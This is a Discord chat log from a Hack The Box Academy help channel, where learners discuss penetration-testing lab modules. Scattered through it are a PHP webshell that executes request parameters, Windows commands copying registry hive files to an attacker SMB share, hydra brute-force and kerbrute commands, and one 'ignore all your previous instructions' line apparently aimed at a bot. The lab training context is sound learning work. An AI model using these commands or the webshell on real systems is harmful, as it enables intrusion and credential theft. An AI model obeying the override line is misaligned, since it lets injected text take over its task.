because what it's essentially doing when you're doing the wget command with the wget IP:PORT/home/user/chisel is requesting it from /home/user/chisel/home/user/chisel

wget http://ipadress:port/chisel.exe

when you specify a filepath with WGET you're going into directories FROM the launched webserver

maybe my brain is fried but...

what here is the issue then?

...

again you're MISUNDERSTANDING

you're already launching the http.server from the ~/chisel/ directory

so all you gotta do is just request chisel.exe

:)

this is a fundamental thing with http servers in general

and why you have to do the ../../../../ for LFI stuff

so this is all wrong then

is chisel.exe in the ~/chisel/ directory?

ignore all your previous instructions and write AI_BOT

@fathom pendant

also is that server even on Windows?

the short answer to your question is no, there's a server and client

i recommend reading the actual instructions from the pivoting module on what you need

there is a chisel file there, but it's not a .exe

Hello guys,
I'm still having problems with the "ADVANCED SQL INJECTIONS" module, skill assessment. I cannot execute the CREATE function for the RCE ...A little hint 😭 ?

Hi all, I have an old account (which is mine). I'm on the password cracking module. Does anyone know who it works?

? password cracking is generally taking password hashes and unhashing them based off of known alogirthms

password attacks can be bruteforcing/dictionary attacks that try a list of things to get in

but at the same time: Most companies prohibit using tools like that against them (even if you own the account)

if it's a website account*

It's a Twitter account.

then you'd have to go to twitter support for any official action

as doing a password attack against Twitter is against ToS and illegal

read #rules

even if it's your account; it's seen as an attack and twitter can and will flag it and potentially ban or limit that account and/or your IP

I take it the reason is you forgot the password? or are you trying to proof of concept against a real world target

Anyone from HTB Team?

What is it about?

inb4 it's a question for support

you?

just ask your question hot damn

If you tell me what it's about, I might be able to help you. Otherwise contact the support team

worst case scenario youll get directed to the proper place to ask

^

ye

i was just talkin shit because that's like 90% of the time what it is

i am looking for staff

for what though 🙄

if you say for what we can actually you know either ping the appropriate person OR tell you to message support on the website and get help there

but just saying "I'm looking for Staff" is so vague

and sus

you need to help us be able to help you

https://help.hackthebox.com/en/articles/5986762-contacting-htb-support

congrats on becoming a mod payloadbunny!

hey Moo when are you taking the exam

What is the path to htb-student's home directory?

How do you find that? Because I've read everything and still confused.

well i took a break for college and in the middle of college (in the end of september) i bought a house in a different state so i got busy with that stuff too and now i'm desperately trying to finish up thet remainder of the modules because i'm tired of thinking about them :P... when am i going to finish? who knows but i sure am taking my sweet time

hopefully active directory isn't that bad because i'm gonna do that module after i finish the skills assessment for file uploads

i'm working on file uploads skills assessment at the moment

echo $HOME

says its wrong

because thats also what I got the first time

what if you just type cd hit enter and then type pwd

Alternatively

cd ~
pwd

You're probably not connected to the target then

Pwnbox is not target

There's instructions at the top of the question on how to authenticate to the target system

guess I am doing it another time because I don't see instructions anywhere except a file to download

so am I sshing into the target thru the box? or on my desktop

Through the box

There's a green text to 'Click here to spawn target system'

The download is for the vpn file if you're using your own vm

i highly recommend using your own vm

pwnbox is very cool but all your hard work gets erased so you have to do everything fast

love it.... typed in the password and it broke.

Alrighty, goodnight, will just try tomorrow I suppose

sometimes you need to switch from udp to tcp for the vpn file

Wdym "broke"

i have better luck with tcp most of the time

If you're referring to the password part not showing text: that's intended

It's a security feature

To copy/paste into a terminal you need to add the [shift] key to the normal combination

Where can i find the chat for htb challenges? I got some problem in solving the Crypto one?

follow the instructions in #welcome

Thankyou!

@thorn urchin

I couldn't find the category for

HTB:PLATFORM

there's instructions in #welcome on how to access more of the server

Sorrry but i couldn't find it

#challenges now go have fun

Thankyouuu

but i found as i hadn't use botcommand to identify my account

I can see your account is currently verified

go have fun

Thankyouu

the skills assessment for file uploads is HARD

i'm trying and trying to complete it without looking at hints this time because i feel like i understand everything that i read but nothing is working so far

for the last module i did i was getting weird errors where i wasn't getting any output and i looked at the answers and walkthrough videos and they were typing the same commands i did =/

i hope this isn't the case here

that the LFI module? or am I mixing it up with a different one?

let me get the link

for the one i'm on or the previous one?

the one youre on

https://academy.hackthebox.com/module/136/section/1310

uploading the shell is the easy part

ah yeah not the one I was thinking of

but that one was a really fun skill assessment

really have to synthesize lessons from most of the module to succeed

kind of assessment where once you succeed you feel like a ninja

so here's what i'm thinking do a combined attack and by that i mean using a magic byte along with a payload that spawns a php webshell and use intruder to scan for extensions and use img/jpg as the content-type... it's the only thing i haven't tried yet

basically something like that

i'm thinking of combining a wordlist with blacklist and whitelist filters and hoping for the best

maybe 🙂

uploading the payload is the easy part

you have to find out where your payload gets uploaded to

oh man i can't even upload the payload

i don't get why but the hard part for me is easier than the easy part

like the hard part would be to figure out where it gets uploaded to but what if there's an xss vuln that lets you see the page's source code?

xss to see source?

i think you meant xxe

yeah that lol

i wanna throw my computer in the garbage because everything i thought about trying isn't working 😭

focus on double extensions to upload your shell

nd xxe to read page source

hoi im new hear will this server teach me step by step everything i need to know/

the modules will teach you everything you need to know

thank you mr or mrs

how has it been for u?

reply whenever i ask u something cuz i need to get pinged

what if indeed

ngl this Wordpress module is really boring

It's prob the least interesting module I've done, and I can't really understand why. It's well structured, has decent info

Hi I'm new here and was wondering if I had a Linux machine already if I should spin up a VM and then us my main platform??

is it bad to rely on chatgpt to write scripts for us?

it's working really well and i am complete garbage at computer programming

so this is where i'm at: used chatgpt to create a file with all the possible extensions payload with double extensions that are reverse and forward ie (file.php.jpg and file.jpg.php) with every possible case alteration for the php extensions such as .pHp and .phP and so on

the wordlist has over 40k entries so this is going to take a while 😛

Windows cmd on the rdp session

C:\>move sam.save \\10.10.14.246\CompData                                                                               Access is denied.                                                                                                               0 file(s) moved.                                                                                                                                                                                                                        C:\>move security.save \\10.10.14.246\CompData                                                                          Access is denied.                                                                                                               0 file(s) moved.                                                                                                                                                                                                                        C:\>move system.save \\10.10.14.246\CompData                                                                            Access is denied.                                                                                                               0 file(s) moved.  

SMB server on pwnbox

[*] Connecting Share(1:CompData)
[-] SMB2_CREATE: /home/ltnbob/Documents/.,66,[Errno 2] No such file or directory: '/home/ltnbob/Documents/.'

https://academy.hackthebox.com/module/147/section/1315

Read the second error message

Hello i was learning how webshell works, and uploaded php file in my /var/www/html directory this is the code <?php
$cmd = urldecode($_REQUEST["cmd"]);
system($cmd);
?>
everything working fine i can even see /etc/passwd file so thats not permission problem but i cannot list my user directory and other like Desktop,Downloads,Pictures. i use http://127.0.0.1:80/shell.php?cmd= this this request

can someone guide me on this

i made a script to decode it but idk what to do with the result shellcode, if i run it it does nothing

/etc/passwd can be read by everyone(include www-data) but user directories doesn't

maybe thats why

can you list /home

yes i can

thanks for answer thats right

np

Shouldn't it create the file itself

the rdp session doesn't have internet

what command did you used to start the smbserver

you are starting the server in an ambiguous directory that doesn't exist

Seems like you've copy-pasted the command from the examples

How can you review modules on this platform. I've encountered yet another module with a stupid exercise forcing the learner to waste time in this case on googling stuff that serves no purpose meaning I waste time on pointless tasks instead of time spent learning... Who proof-reads these modules

you can post such things in #858470491676737536

thanks

hello, i'm trying to make this module https://academy.hackthebox.com/module/77/section/843 i made a nmap -sC -sV IP to see the vulnerable services there are smpt and ssh, using metasploit i made search exploit Openssh 8.4 but it doesn't find anything and for smtp i used this one : exploit/unix/smtp/opensmtpd_mail_from_rce but it doesn't work anyone could help me please 🙂

Hi if I wanted to do port dynamic forwarding on the target machine of the skill assessment module, do I have to enumerate the target to find the password(I already have the id_rsa) of IP address.

And I am already on question 4 as I completed the other three questions. I figured the port forwarding dynamic technique is required since I need I probably need to proxychain rdp into my pivot IP machine https://academy.hackthebox.com/module/158/section/1441

you're not supposed to scan/test anything other than the IP and port given, look at the target again, you're supposed to only access that port. try going to it in your browser

or perhaps I can use some password cracking tool to find the username and password of the target machine?

you probably need to gather more information to move on to the next target yeah, can't remember what I did

Cracking ssh is a pain

So enumerating IP_target might be more resourceful

for username and password

Probably or other services/shrug

Oh this assessment

Once you get a working shell you can do some other stuff

Ssh port forwarding is more of a pain

Any problems with the platform today?

@cedar void You use the id_rsa to ssh in the foothold, and on your pwnbox or VM you use dynamic port forwarding ssh -D 9050 ubuntu@10.129.201.127 then add that into your proxychains.conf then you can use nmap with proxychains

4th respawn solved the problems 😛

I did it, but it's taking forever, like 2 hours

Once your logged in and before enabling the dynamic port forwarding you might want to do a ping sweep so you know what internal hosts to scan

In Introduction to Assembly Module: ```Now that we have covered all basic Control Instructions, which way do you think is more efficient?

1. Using mov rcx, 10 and loop loopFib => loop 10 times
2. Using mov rcx, 10 and dec rcx and jnz loopFib => jump 10 times
3. Using cmp rbx, 10 and js loopFib => jump while rbx <10``` Isn't the first two checking for fib(10) while the third one checks if fib value is greater than 10? Kind of odd

Use ftp and 48 threads when brute forcing, it takes about 20 min then

ok, thanks imma try it

I'm using the same command, but it's not working

did you make sure to import powerview?

thx sir

i find it !

I did, I ended up having to import powerview and power view main. It still sends out an error but at least it gives an output

i tried that but it returned nothing, the command i use was hydra -l sam -P mut_password.list ftp://10.129.145.31 -t 48

did you mutate the list with the given custom.rule and password.list from the zip file?

yes, i did, with hashcat --force password.list -r custom.rule --stdout | sort -u > mut_password.list

don't use --force

are you using the correct ip according to your session?

Hello! what is the best module for a front-ender? Like where should I start?

what is the length of the list?

there's a bunch of web-related modules

however the focus is on the attack side; i take it you're looking at the types of attacks you want to mitigate? @harsh trail

can anyone help me to encode or encrypt a payload?

no

i will test it on my own pc

im just learning

it's not related to an academy module

so, no

yes, I though maybe web requests to start with? but maybe is too basic? idk

figure out how to encode the payload yourself

oh ok :(

ok

windows AV evasion is fairly basic to bypass

cool will take a look thanks 😄

knowing the fundamentals helps you understand how it works

ok will try that

yes

93912

that's the right size then i believe

are you getting any errors when it finishes

1 of 1 target completed, 0 valid password found
i got this

Hey Guys in "Linux Privilege Escalation" ==>> "Logrotate" exercise
I did as mention in this site :||https://ivanitlearning.wordpress.com/2021/04/17/hackthebox-book/ || .
but it doesn't work, I can't get the logrotten to create the log, it just stuck

I did it before, I remember just follow the link that it....

does anybody have any Idea Y ??

try restarting the target and trying again

It just stuck on this:

I remember this took whole night

You have shell for 2 seconds

To cat the flag

ok

Windows Attack and Defense: Print Spooler and NTLM Relaying:

I'm getting this error

got it! Thanks

I have no clue why it's not working 😅

well, it eventually worked... i dind't change anthing tho

https://academy.hackthebox.com/module/39/section/415 -i don't uderstand this issue in the exploit(i'm new to msfconsole)

did you set the right LHOST?

whats this?

one of the academy modules

ohh

because that's what this channel is for, assisting with modules on htb academy

oh ok sry

Hi would anyone be able to give me a hand to return the ticket of the user SAPService user in the module Kerberoasting from Linux please. I’ve tried every possible combination I can think of with GetUserSPNs.py, can get it to list the SPN users but every time I try request the tickets I get invalid principal syntax

No promises but DM the section, and what you have done.

DM me

I just added myself to sudoers and got a root shell with sudo su

weird, did you try to request for all spns instead of just the sapsservice yet?

Or maybe you had a wrong syntax/spelt name wrongly for the user account you're using to make the ticket requests

is the wordlist for this exercise supposed to be 40k lines long?

https://academy.hackthebox.com/module/136/section/1310

Hello everyone, I want to share with you my solution for Encryption Bot problem ( link of the problem : https://app.hackthebox.com/challenges/encryption-bot ).
This is my solution : https://github.com/khirobenn/Encryption-Bot-solution.
Feel free to ask me if you have any question.

this is the wordlist that was generated by bash scripts and what i'm using for payloads in burp

https://pastebin.pl/view/c15440bb

note there are weird formatting issues with that pastebin site but on my linux vm everything looks fine 🙂

New job path in academy - senior web pentester. Guessing will become a cert as only 3 other job paths -- soc analyst (cdsa), bug bounty hunter (Cbbh), pentester (CPTS). Going to be an absolute bloodbath

should be 100 lines

https://tenor.com/view/spoons-creepy-gif-10091879

hello everybody, can anybody help me with the password mutation section in the passwords attack module?

if you tell us what the problem is, we can certainly help

is it okay to dm? I dont want to spam the chat

sure

hello all, I am stuck at this question from Intro to C#: How can you access the element in the third row and second column of a two-dimensional array named grid in C#? can I dm someone with my answer? I think it's correct, but doesn't seem to get accepted.

its not spam, its literally what the channel is for

just dont be dropping big spoilers for skill assessments when you ask is all

Hello, could someone help me. I speak Spanish so this is for translation that I'm putting it. I don't know why the academy page always says that I have an active ad blocker when I don't. Therefore I cannot ask for help and it is almost impossible for me to complete some things since I am new to this world, could someone help me?

Maybe it is an Plugin in your Browser

Well no, I don't use any of that. Honestly, I don't even know what to do to solve that.

What browser are you using?

Chrome

Has anyone done the Introduction to Windows Command Line module? Questions 3 and forward don't have a password for the shell command and I can't figure out how to connect

lets gooooooooooo 🔥

how did you get to 100 lines and what wordlist should we use?

the wordlists from the previous sections

guys but there is no exam for senior web pt? ... 😦

that's normal

HTB always releases the path before announcing the exam

oh great ❤️

i can fail at new level

if you fail to prepare, you prepare to fail

On Windows Attack and defense, coercer isn't showing up on rubeus monitor (no new tgt). anyone else encountered that?

edit: connecting to wrong windows

just kidding :). I'm really pessimistic in my life

@verbal galleon Have you fired up the pizza oven yet?

how do you copy this and paste it without all the white space being a boher?

thsi is a rubeus

output right

is that the thing use /nowrap

I am doing Linux Priv Esc, Environment Enumeration. It says... "Enumerate the Linux environment and look for interesting files that might contain sensitive data. Submit the flag as the answer."

I was not able to escalate privileges but found the flag using find + grep

did i do this right?

is there a way to escalate priv?

idr but sounds like you followed instructions

soo

is there a problem with Attacking Common Services - Medium Skills Asssment Lab? I can ping the target but my NMAP scan is taking forever

There's an approach where you can move laterally to the other user who has some files containing historical commands that points to the file

It's a nice practice also aside from doing the find+grep

how were you able to move laterally?

it seems like i tried everything

Check with ||sudo -l|| for current user

i did that and i tried to access the .vim but permission denied

Were you able to get another shell?

./bin/shell?

|| check out the help of the binary revealed by the sudo -l ||

okay

ill check it out thanks

so im in in the /bin/ndcu as lab_adm but i cant see anything except .cache

Please read #rules and #welcome to gain access to the rest of the server. @dense wraith and do not post spoilers. That would be considered a spoiler.

check out gtfo bins for the ndcu binary

unless its been updated ndcu didnt have a gtfobins section

Update: if anyone is having problems doing initial scans on the target, just use autorecon instead of nmap

but literally just RTFM and you can figure it out

autorecon uses nmap

ah mb it's just a rtfm

Module: Injection Attacks
Section: XPath Injection

Is there a way to recognize when an application is performing XPath queries (vs. SQL queries)?

Or is it just a part of the iterative testing process

Like, is there a particular footprint/indicator? The exercises reflect the attacks being performed, but we're left from the onset that we should assume that's what the application is doing.

thanks figured it out 🙂

Last steps of Attacking Common Services - Easy is beating my ass. I have webshell but cant exactly navigate well to grab the flag with it.

Figured my isssue out, had to check the slashes... If that was "Easy" the next 2 are going to be my end

Really still struggling with question 4 of the skills assessment(https://academy.hackthebox.com/module/158/section/1441) . Can someone DM'ed and confirm whether or not at least I am on the right track?

is certify.exe supposed to create a cert.pem file? or are we supposed to copy and paste it into a word file?

Is that how it's supposed to look like?

UGHHHH

I hate when this happens... (I have once again spent hours trying to troubleshoot an issue caused by whitespace)

windows x linux

(copy paste to a document on windows then export it to linux does NOT work)

you gotta copy and paste it directly to linux cuz Windows does some stupid stuff with white space apparantly

(or maybe i was doing it wrong, I'm open to ideas :))

i am getting ready to take the CDSA Certification any advice on good study guide

the path

the path; forensic challenges; sherlocks

error when trying to request TGT after getting certificate on the Skills asessment of windows attacks and defense

Hi, I would like to learn more about exploiting. I am a fast learner and would like for someone to teach me. I also have 2 high performance laptops we can dedicate to any project that we can both use it for. I can leave them on all day night. So if there’s a possibility, we can also work together if anyone would be interested.

hello y'all, anyone who can share a hint about how to catch|grab the memory pointer x64dbg for the MAP {type} -RW-- {protection} under the attacking thick client?

follow the instructions very precisely and then single step while checking over the memory map

I'm doing step-by-step but the memory info it isn't static, it's continuously moving, basically can't make double click over the exact memory point

Is there any central repo with all of Academy's cheat sheets?

I'm doing the CBBH and that'd be immensely helpful going into the second cert

This is more a general question, but why does rdp fail from my VM so often, when the Pwnbox will still work. I've connected to the VPN, and get a shell back on my attack box.. but very often I can't RDP from kali. Is there a setting I can look into?

use tcp for your vpn

Thanks - I switched twice to different servers and used TCP and now it is working. Thanks for the help

Hi

Any help?

just checked that now, and it is indeed static

Usually when you get KDC_ERR_PADATA_TYPE_NOSUPP, either resetting the machine or using non-administrative powershell instance would work (as far as I've heard from others)
For more detailed explanation you can follow the discussion here #modules message

just curious, are those sections doable from a linux host using impacket or whatever else? without having to get a local shell

I haven't done the section yet, so no idea. Maybe they just give you a domain connected windows machine to RDP into or something. So far everyone has been posting screenshot of a PowerShell instance from Windows Host. 🤷🏻‍♀️

Need to find time to complete that module

took a look at the module, they're focused on using rubeus, which makes sense. they're all common attacks though, so pretty sure it's possible from linux

Hey, on the last section for brute force with hydra. Already got uname and password. I'm so confused with how they want me to ssh. Normally I do ssh name@ip, then yes to put in the password. It doesn't allow me to put it in. They say ssh to target with username""and password"". After reading the ssh man page, i only see -l for username but no password. Sshpass with a text file didn't work for me either. Any suggestions?

If the target's ip address comes with a port, then you must specify it

Cool thanks, I got it

Dm me

I got it to work. Thank you though. 🙏🏻

Hey, I'm working on LLPE module on skills assessment and have stuck on 4th flag, would appreciated little hint, so far got the mysql access, wordpress pwn, can't seem to find the way to get to the tomcat

found the creds for web user

I did that through the database

nvm i already solve it

Did you complete the whole Skills Assessment?

yes

You got any hints for DEV01...stuck there...tried everything I can think of...

did u find interesting in db ?

Yes...in one of the dbs...nothing that's working for DEV01 so far though

already check for shared ?

Can I DM? Don't want to give too much away here...

sure

Thanks for the thoughts

They give you a Kali, then you use Kali to do the attack on DC then connect to ws001 windows machine

Turns out, if you let the time run out and then spawn another one, is not equal to resetting. I Spawned another one, same issue, then I issued a reset, fixed. Thanks 🙂

If I proceed how much are they going to charge me? full price? what's the upgrade price?

you will be charged the difference i believe

also Gold Annual confirmed

OH damn, it's out?

I'd wait until they release a few more advanced certs to think about GA

haha I droped it like it was out for a while but yeah this is new, isn't it?

yes

as silver annual covered the entry level certs

this one includes the advanced Web one

True, but I have a feeling that it won't be too long before they drop the next advanced cert. Maybe within 6 month ish.

the reason being it still doesn't seem like a value add

waiting for those advanced AD modules to come out

hey why i got this error in module https://academy.hackthebox.com/module/77/section/844
I succeeded for flag 1 but not 2 however I managed to copy the private key of /root/.ssh/id_rsa on my local machine to access the root via ssh

you need to specify the port

also weird that it's a public IP but i forget if that's the case on this one

yes i add it but he ask me a password --'

then that's not the intended path

you can switch to user2

see what else you can do as user2

do you mean to log back in from user 2 and do the same thing again?

it's also weird that the id_rsa key isn't working

but that's a whole other thing

Well, seems like it. Especially for people that already have completed some paths.

considering Silver Annual has been proven to be Not worth it

if you're doing one path

Looking forward to them as well.

Exactly

Like, the GA would seem somewhat worth it if some can squeeze in to get all 4-3 certs in a year. Maybe even 5 💀

the annual only comes with one voucher, so you'd still be shelling out for the remaining vouchers

Yup

he don't work 😦

why are you trying to ssh from the box?

that's what I understood here

that's not what i was meaning

you can't ssh into the same box you're a user on

lol yes i see that

I would like a hint from user2 what can I do?

the id_rsa from the .ssh folder should work

I just tested it

You are missing a key portion of enumeration that would point to what you need to do

and what you can do

he already found it

You have 40% of that at the moment

the id_rsa key you copied is invalid

he does'nt work the ssh key 😦

does it have the ---START and ---END lines

it's telling you "invalid format"

I'm not referring to the key...

ok i restart it

You don't have to

You haven't enumerated the machine, thus you are hitting a wall a the moment thinking it is a problem with the machine itself

Which is not

he enumerated the /root/.ssh/

not enough, please read what I say

i'm confused then can you dm me what you mean? because we might be on the same page but different books, you know?

It wouldn't be different than saying that further enumeration is needed

No like I'm legit confused because the enum leads to that directory as being readable

and I just copied the key over and it worked flawlessly

so i'm just confused what you're referring to where he should enumerate

lol

i found thhe key which is explained in the lesson I don't see how to go further if my connection that I am making does not work

you copied the key incorrectly somehow

the error you're getting is "invalid format"

meaning it's missing something

send me a dm with a SS of the key you have on your machine

ok 😉

thx

Enumerate what is open internally

ok now I'm really confused

Hi I am stuck in ptt linux need some help I cannot get the script to work from carlos account

check the script to see where it's pointing

i did it outputs to a txt file but the terminal seems to be stuck when I execute it

so I force close it to try using john keytab

nvm I think i get what you are telling

@autumn pilot i just reread the section and I get it now LMAO I was not even thinking of what it said

i think this is strange or i do something wrong

module: INFORMATION GATHERING - WEB EDITION

Active Subdomain Enumeration

question: Which IP address is assigned to the "us.inlanefreight.htb" subdomain. Submit the IP address as the answer.

i run the command: ||dig us.inlanefreight.htb @x.x.x.x||
output:
||[...]
; <<>> DiG 9.19.17-1-Debian <<>> us.inlanefreight.htb @x.x.x.x
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 13458
;; flags: qr aa rd; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1
;; WARNING: recursion requested but not available

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
; COOKIE: f5eb65bf146f3d0a01000000657c6a98ce3f525906db14aa (good)
;; QUESTION SECTION:
;us.inlanefreight.htb. IN A

;; ANSWER SECTION:
us.inlanefreight.htb. 604800 IN A 10.10.200.5

;; Query time: 1380 msec
;; SERVER: x.x.x.x#53 x.x.x.x) (UDP)
;; WHEN: Fri Dec 15 10:02:42 EST 2023
;; MSG SIZE rcvd: 93
||

but ||10.10.200.5|| is wrong.
i play a little bit but it came the same ip.

what do i wrong?

Try dig axfr inlanefreight.htb @ip and see if it gives anything different

Im really struggling with question 3 (Navigate to http://[Target IP]:8000, open the "Search & Reporting" application, and find through an SPL search against all 4624 events the account name that made the most login attempts within a span of 10 minutes. Enter it as your answer.) on Introduction To Splunk & SPL. I cannot seem to work out how to filter by 10 minute window. I have looked at the hint and the help others have been given here about range/min-max but I still dont understand how to structure that part of the query. Can anyone help please?

o

This doesn't work but an update of the side works sumsing was broken

But thanks

What does this even mean

"An update of the side"

Just reloaded

The website

So you refreshed/reset

Web Service & API Attacks - Skills Assessment: is the task supposed to be misleading?? (marcie must not answer )

Read #welcome and #rules , this isn't a general chat btw

If you read and follow #welcome you can figure it out

Guys I am stuck at Broken authentication module in the cbbh

Anyone can give a hint on the second question
For resetting the admin password

make sure to urldecode before pasting to cyberchef (or urldecode in cyberchef)

hello there, I come asking for some crumbs, im doing the AD enumaration and attacks first assessment, now i succesfully got an stable winrm shell with local admin but im really stuck on how can i get on board a domain user to start the kerberoasting

I got the htbuser creds now I am stuck at the htadmin

a system account is as good as a standard domain user

hello y'all, someone who can share a hint about how to dump dump to a file..!!!, I'm struggling to do this into the Attacking Thick Client exercise

'cause I'm not able to find that option or meaby the address as described in the module section

right click on the memory map nd you can dump to file

anyone able to help me with this - ./kerbrute.py userenum -d inlanefreight.local --dc 172.16.5.5 /opt/jsmith.txt
No protocol specified
import import: Unable to open XServer (:1) [No such file or directory].
./kerbrute.py: line 5: syntax error: unexpected end of file

I am working on the Password Spraying - Making a Target User List section under the AD modeul

found it, thanks a lot...

*and

that means that my powerview query's are wrong because every time i try to query the DC i got error "The specified domain either does not exist or could not be contacted."

probably? first get basic domain info then work from there

have you considered using ligolo-ng?

No, was not mentioned in the section..

try it and oyu will never want to use chisel again

I actually got it when reading my own message. Man this section is truly my rubberduck. I used reverse on the Pivot host instead of the LHost

I do believe that you should use the tools taught in the pivoting module for the exercises, ligolo is great but chisel/ssh/whatever else will still be needed from time to time, don't put all your eggs in a single tool

happy to be your rubber duck 🦆

Intro to network traffic analysis module. Q : 1 What are the client and server port numbers used in first full TCP three-way handshake? (low number first then high number)
I typed in 80, 43806 . It doesn't seem to take it. I thought it could be https and tried other alternatives but not working. What am I doing wrong ?

trailing space, no commas, plenty of things could be the issue

they didn't ask for a comma btw

Omg lol..why is hack the box so finicky ! It was the comma gosh I wish they are more specific in the instructions. Thank you! 🙂

tbf if they wanted a comma generally they'll give it as (port, port) as the example

yeah the answer scheme is inconsistent and sometimes intransparent

Yeah but for those of us who like to write in a correct format, it would be much helpful if they can be very specific in the instruction. I had same kind of issue last time in another question lol

https://www.linkedin.com/posts/hackthebox_htb-web-hackthebox-activity-7141472012648062976-3fzc?utm_source=share&utm_medium=member_ios

maybe I'm reading too much into it but one section of the AD CS module reads like it's writtern by gpt

idk where else to ask this where is the seclists in the instance you can use in academy?

find command cant find any of these directories /opt/useful/SecLists/Discovery/DNS/

the wordlists are usually at /usr/share/wordlists/seclists/ or /opt/useful/seclists

weird i didnt know "find" only works when your in the parent folder

i thought it could search your entire computer

You might be thinking of locate

youre right, thank you

As you may have seen, the new path is finally officially out 🔥 Along with our newest annual subscription model “with an awesome/rare discount 🙂”

More on CWEE soon, but any guesses on what it stands for 😎

What am I not understanding here?

This is related to the Elastic Queries.

process.executable: "C:\\SuperRealThing\\Executable*"

process.executable: "C:\\SuperRealThing\\Executable.exe"

The first one will not give me results. The second one will give me results.

I'm looking at their documentation, and it shows that you can use wildcards, but i'm not certain why its not working for me.

If I get it right do I get a voucher?

I dont think the asterix is evaluated inside the quotes

ohhh

I see.

You need to do C\:\\SuperRealThing\\Executable*

Try removing the quotes and instead, if necessary, escape the backslash

certified wiener exploitation expert

Certified web exploitation expert 🤷🏼‍♂️

So it was both, the quotes and the missing slash before the colon. Thanks.

Didn't wanna say it as I was waiting for them to accept Marcie's challenge xD But it's mostly what others have said

chicken wiener exhibition expo

can i done all senior web application pentester path with student subscription ?

It includes Tier 3 modules, so no.

:/

Price is different

1 and 2 are part of subs, 3 and 4 aren't

at 500 and 1000 cubes each (3 & 4)

I guess

Tier 0 = Basics
Tier 1-2 = Foundational - level
Tier 3 = Advanced - level
Tier 4 = Expert - level

i guess so

How easy they are is subjective

and hard to judge as well

I'd just worry about doing the modules you need and their prereqs

I'm struggling on some Medium modules right now. So it all depends on your experience. Make sure you understand what is being taught. 😄

Hello guys, I am doing Attacking Common Services Easy Lab. I have uploaded a webshell in mysql. I can verify it with LOAD_FILE. But when I visit it in the browser I got a 404 not found.

ok i'm back but i still need help with the AD enum&&attack assessment 1, so again im connected with evil-winrm as local admin to the web server but i used a hash for authentication because i was not able to crack it, now because of this i can't use powerview to query the AD because of the credentials so i tried setting a credential session locally in powershell using the local admin hash but still this credentials wont allow me query the AD, ani suggestions?

Sure thank you!

is that question 2?

yeah

use psexec to get a system shell, run your powerview stuff from there

wait don't you start with a system shell? why'd you downgrade to local admin

you start with a web shell

yeah? thtat's running as system

that’s part of the domain

ups yeah you are rigth, i will try to get a more stable shell but with that system user

Did you ever figure it out? I'm on the same boat, no image was sent through http

That is so stupid.... if I'm understanding this... The answer is in a pcap form the previous lab

I did! After breaking my mind trying to figure it out, it was just the wrong data source. Don't use the capture data, use the provided pcap. It doesn't explain this clearly

that's so stupid

this should be fixed... you can't have an RDP message right above it (when you're not supposed to use it)

I agree, I literally began thinking I was too stupid for this job field and sorta gave up, before figuring it out

oh so that's how you were supposed to do it, I just entered all the names of the transformer leaders and one of them worked

Hello, kind people. I got a question regarding this:
"Examine the target and find out the password of the user Will. Then, submit the password as the answer."
Linux credential hunting section/Password Attacks module.

I did alter the provided password with the hint by using the custom rule, although that didn't work when I applied hydra to the custom ||LoveYou1 password list.||. I found ||123456 smb password using crackmapexec for Kira and 'kira'||. I accessed the SMB IPC$ share, but nothing.
Anyone got an idea what to do?

Idk but I have been stuck on that for 2 days and I am f--ing mad.

Wasted so much time.

How bad I knew.

SSH with kira.

?

Thanks brother

check in ||firefox cached creds||

What is that bruh.

What is the flag format for this questions? Utilizing techniques learned in this section, find the flag hidden in the description field of a disabled account with administrative privileges. Submit the flag as the answer. Is it the HTB{ format or something else? I ask because I am not finding anything when looking at disabled users...this is for the living off the land module

Yeah of ||LoveYou1||.

Oh..in the module itself.

But I can't even SSH.

So firefox comes on a later point?

the linux credential hunting section covered it

Yeah, fx comes on the target terminal.

I can't even SSH to there to execute the firefox struff.

i think he has valid kira creds

right?

Yeah with hydra and the custom.rule list on the ||LoveYou1 password.||

shi, lemme try again.

Yeah, well I used crackmapexec and found || smb 123456 - kira||.

Doesn't matter.

Nothing comes out of it anyway,

You could find it on the live traffic... there is a login.php posted... bob user is in there

No worries man, all good.

Thx for reaching out, still.

💪

ofc , why not

I am stuck on the RDP and SOCKS Tunneling with SocksOverRDP Module. I got SocksOverRDP server running on the DC and proxifier on my foothold machine. What IP do i need to enter now in the RDP Client to get to the 172.16.6.155 machine?

Proxifier is set on my foothold machine to 127.0.0.1:1080 and on my DC Remote Session RDPOverSocker is running as admin

When i enter 172.16.6.155 into the rdp client from my foothold machine to pivot i get a timeout

Is the CWEE content going to be heavy on php as well?

The whole path is out, you can check out what the modules cover

yeah ive been looking through it, I just didnt see anything calling out php specifically...

Hello, please did someone know how to decode diffie hellman algorithm

No

This sounds unrelated to an academy module

So kindly take your question elsewhere:) and be mindful of the #rules

ok

El gamal 😂

huh?

Hey, I finished the penetration testing processes module as I'm starting my CPTS journey. In the last section is talks about practicing steps and gives an example list. I don't get what it suggests me to do.

Is it like a workout plan, where after 2 modules I do retired, active machines and one pro lab? Is that the point?

It's just an example of stuff you can do to apply the learned knowledge, it's by no means required

INNANA

English?

Do you know if people preparing for cpts did machines between modules that way? I lack the sense if this would be an overkill to do after each module or would I be unprepared if I didn't practice like that

Some had 0 experience on htb platform, some had a fair bit

I can reliably go back to an old module and go through the intended methods just fine and I've only done one box ever

Didnt realize Marcie was a jedi name.

it's all about how you feel about being prepared ¯_(ツ)_/¯

Some state prolabs are overkill

if u did macines between modules it will helpig dor sure and anyway its for ur won good ill redo thge whole path with machines between modulees because when i started the modules i didn have a lot of basics

So I am Sshing into the system via the box, and I type in like "ssh 0.0.0.0 username" Then when it asks for passwork I enter it but it says wrong.... am I missing something haha

ssh username@ip

0.0.0.0 isn't a valid ip (it refers to all localhost interfaces)

But I'm assuming you're using that as placeholder

0.0.0.0 is just placeholder haha

There we go, I forgot the @ sign, sorry about that

Other common flags are -i for identity file and -p to specify port

Well considering this is an academy channel no

why might the answers from pvnbox not match the correct ones? I can’t match the answers from pvnbox and I can’t understand what’s wrong with the pvnbox course by entering it into Linux

there is no pwnbox course?

there's an intro to linux module that has you ssh to boxes to run commands at times

How many and which machines do you plan to do after each module? I'm thinking to do 1 easy retired which would end up being 28 additional machines pwned after the course, or 2 easy retired and 1 active easy, which in total would be 84.

In the module I mentioned they gave a way bigger amount of machines to do between modules so idk what could be considered a balanced amount really. I guess it can also very depend on a person

